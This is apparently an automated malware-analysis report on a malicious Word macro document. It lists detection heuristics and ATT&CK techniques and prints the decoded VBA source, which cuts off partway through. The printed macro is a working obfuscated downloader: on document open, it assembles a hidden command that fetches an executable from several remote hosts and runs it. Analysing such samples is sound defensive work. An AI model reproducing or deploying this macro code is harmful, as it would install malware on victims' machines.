Verdict: MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is a malicious Office document containing a VBA macro. The AutoOpen subroutine is present, indicating it will execute automatically when the document is opened. The script attempts to construct and execute a command using obfuscated string concatenation, which is a common technique for downloading and executing further malicious content. The ClamAV detection name 'Doc.Downloader' further supports this assessment.
Heuristics (5)
- ClamAV: Doc.Downloader.00536d-6691372-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.00536d-6691372-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5120 bytes |

SHA-256: 38b451e5b3cfbc577df705d30201f93b251b21070753826c9cacc2ef940266fe
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "KwOWiLclmzhiT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const EBzqHivSBm = 0
Dim ncqZmz(2)
ncqZmz(0) = Right(RSzmpV, 714)
ncqZmz(1) = Right(RSzmpV, 714)
Dim FDGYj(5)
FDGYj(0) = Right(RSzmpV, 714)
FDGYj(1) = MidB(OiausG, 647, 381)
FDGYj(2) = Left(rpXzOl, 37)
FDGYj(3) = Mid(paYDvG, 537, 387)
FDGYj(4) = MidB(OiausG, 647, 381)
Dim XtFFUn(3)
XtFFUn(0) = Left(rpXzOl, 37)
XtFFUn(1) = MidB(OiausG, 647, 381)
XtFFUn(2) = Right(RSzmpV, 714)
Shell@ rwiwnGT + vvqkUijSdkIdjI + wpbwhAfjhU, EBzqHivSBm
Dim zfVMv(3)
zfVMv(0) = Right(RSzmpV, 714)
zfVMv(1) = Mid(paYDvG, 537, 387)
zfVMv(2) = Mid(paYDvG, 537, 387)
Dim QKrlL(4)
QKrlL(0) = Left(rpXzOl, 37)
QKrlL(1) = Left(rpXzOl, 37)
QKrlL(2) = MidB(OiausG, 647, 381)
QKrlL(3) = Mid(paYDvG, 537, 387)
Dim pCHIpU(3)
pCHIpU(0) = Mid(paYDvG, 537, 387)
pCHIpU(1) = Mid(paYDvG, 537, 387)
pCHIpU(2) = MidB(OiausG, 647, 381)
Dim wzSwoi(4)
wzSwoi(0) = Left(rpXzOl, 37)
wzSwoi(1) = Right(RSzmpV, 714)
wzSwoi(2) = Right(RSzmpV, 714)
wzSwoi(3) = Mid(paYDvG, 537, 387)
End Sub
Attribute VB_Name = "DAswUfSL"
Function rwiwnGT()
Dim DBiBM(4)
DBiBM(0) = MidB(OiausG, 647, 381)
DBiBM(1) = MidB(OiausG, 647, 381)
DBiBM(2) = Mid(paYDvG, 537, 387)
DBiBM(3) = Left(rpXzOl, 37)
Dim pftba(2)
pftba(0) = MidB(OiausG, 647, 381)
pftba(1) = Left(rpXzOl, 37)
Dim wqHNkR(4)
wqHNkR(0) = Mid(paYDvG, 537, 387)
wqHNkR(1) = Right(RSzmpV, 714)
wqHNkR(2) = Mid(paYDvG, 537, 387)
wqHNkR(3) = Mid(paYDvG, 537, 387)
Dim sOXiz(2)
sOXiz(0) = Right(RSzmpV, 714)
sOXiz(1) = MidB(OiausG, 647, 381)
fdwBnRsMmb = Chr(Format(18 + 1 + 15 + 5 + 60)) + "md /V^" + ":^ON/" + Chr(Format(12 + 1 + 10 + 3 + 41)) + Chr(Format(5 + 0 + 4 + 1 + 24)) + "^s^et" + " V^t= ^ ^ ^ " + "^ ^ ^ ^ }}{h" + Chr(Format(18 + 1 + 15 + 5 + 60)) + "^t" + "^a" + Chr(Format(18 + 1 + 15 + 5 + 60)) + "^};^kaerb;VN^a^$ m^et^I^-" + "ek^ovn^I;)VN^a^$^ ^,^jlN^$(" + "^e^l^i^Fd^aoln" + "^w^o^D^.Aw^q^$^{^yrt^{)^" + "X^pn$ n^i^ ^j"
Dim iEGjv(2)
iEGjv(0) = Left(rpXzOl, 37)
iEGjv(1) = MidB(OiausG, 647, 381)
Dim hMStm(3)
hMStm(0) = MidB(OiausG, 647, 381)
hMStm(1) = Left(rpXzOl, 37)
hMStm(2) = Right(RSzmpV, 714)
Dim ldRrX(5)
ldRrX(0) = MidB(OiausG, 647, 381)
ldRrX(1) = MidB(OiausG, 647, 381)
ldRrX(2) = MidB(OiausG, 647, 381)
ldRrX(3) = Mid(paYDvG, 537, 387)
ldRrX(4) = Right(RSzmpV, 714)
Dim nhbBZ(2)
nhbBZ(0) = MidB(OiausG, 647, 381)
nhbBZ(1) = MidB(OiausG, 647, 381)
NBZPBiHqiVN = "^lN$(^h" + Chr(Format(18 + 1 + 15 + 5 + 60)) + "a^ero^f;^'exe" + ".^'+^ph^" + "j^$^+^'\'+" + Chr(Format(18 + 1 + 15 + 5 + 60)) + "^" + "il^b^up^" + ":vne^$=VNa$^;'3^34^'^ =^ phj" + "^$;)^'@'(t^ilp^S."
Dim QrzsQ(2)
QrzsQ(0) = Left(rpXzOl, 37)
QrzsQ(1) = Left(rpXzOl, 37)
Dim suWJUT(3)
suWJUT(0) = Left(rpXzOl, 37)
suWJUT(1) = Right(RSzmpV, 714)
suWJUT(2) = Mid(paYDvG, 537, 387)
OYLXh = "'mm/^s^u.ohsin//" + ":pt^th^@^aXBbX/^un^.^t" + "^ensp//^:p^t" + "t^h^@L^DNz" + "D^GB/^wvvw/^m^o" + Chr(Format(18 + 1 + 15 + 5 + 60)) + ".^e" + Chr(Format(18 + 1 + 15 + 5 + 60)) + "^a^lpr^a^eg//^:^ptth" + "@W" + Chr(Format(12 + 1 + 10 + 3 + 41)) + "F^dv/"
Dim fGWGUJ(2)
fGWGUJ(0) = Mid(paYDvG, 537, 387)
fGWGUJ(1) = Right(RSzmpV, 714)
Dim JMYBo(5)
JMYBo(0) = Left(rpXzOl, 37)
JMYBo(1) = Mid(paYDvG, 537, 387)
JMYBo(2) = MidB(OiausG, 647, 381)
JMYBo(3) = Right(RSzmpV, 714)
JMYBo(4) = Mid(paYDvG, 537, 387)
YXGhmOG = "^m^o" + Chr(Format(18 + 1 + 15 + 5 + 60)) + "^.rosn" + "^a^s^ak^e^pi//:^p^tth^@2^I^" + "f^dgn^G" + "^A/^m^" + "o" + Chr(Format(18 + 1 + 15 + 5 + 60)) + ".^ar^a^g^esn^i//^:^" + "p^tt^h'=X^pn^$;^tn^e^" + "il" + Chr(Format(12 + 1 + 10 + 3 + 41)) + "b^e^W.t^" + "eN ^t" + Chr(Format(18 + 1 + 15 + 5 + 60)) + "ej" + "^bo^-^w^en^=A^" + "wq$^ l^l^"
Dim cczkai(4)
cczkai(0) = Mid(paYDvG, 537, 387)
cczkai(1) = Right(RSzmpV, 714)
cczkai(2) = Mid(paYDvG, 537, 387)
cc
... (truncated)